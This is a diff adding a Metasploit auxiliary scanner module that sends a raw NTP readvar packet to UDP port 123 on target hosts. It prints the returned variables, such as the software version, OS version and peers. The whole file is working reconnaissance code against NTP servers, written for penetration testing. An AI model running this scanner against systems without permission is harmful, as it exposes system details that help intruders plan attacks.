NTP Clock Variables Disclosure

Author: crashbrz

modules/auxiliary/scanner/ntp/ntp_readvar.rb

@@ -0,0 +1,67 @@
+#####
+
+
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+#   http://metasploit.com/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Auxiliary
+
+
+	include Msf::Exploit::Remote::Udp
+	include Msf::Auxiliary::Report
+	include Msf::Auxiliary::Scanner
+
+
+	def initialize(info = {})
+		super(update_info(info,
+			'Name'           => 'NTP Clock Variables Disclosure',
+			'Description'    => %q{
+				This module reads the system internal NTP variables. These variables contain potentially sensitive 
+				information, such as the NTP software version, operating system version, peers, and more..
+			},
+			'Author'         => 'Ewerson Guimaraes(Crash) <crash[at]dclabs.com.br>',
+			'License'        => MSF_LICENSE,
+			'Version'        => '',
+			'References'     =>
+				[
+						['URL','http://www.rapid7.com/vulndb/lookup/ntp-clock-variables-disclosure' ],
+			]
+			)
+		)
+		register_options(
+		[
+			Opt::RPORT(123)
+		], self.class)
+	end
+
+	def run_host(ip)
+
+		connect_udp
+
+		readvar = "\x16\x02\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00" #readvar command
+		print_status("Connecting target #{rhost}:#{rport}...")
+
+		print_status("Sending command")
+		udp_sock.put(readvar)
+		reply = udp_sock.recvfrom(65535, 0.1)
+		p_reply =( reply[0].split(","))
+		arr_count = 0
+				while ( arr_count < p_reply.size)
+						if arr_count == 0
+							print_good (p_reply[arr_count].slice(12,p_reply[arr_count].size)) #12 is the adjustment of packet garbage
+							arr_count =  arr_count + 1
+						else
+							print_good (p_reply[arr_count].strip)
+							arr_count =  arr_count + 1
+						end
+				end
+		disconnect_udp
+
+	end
+
+end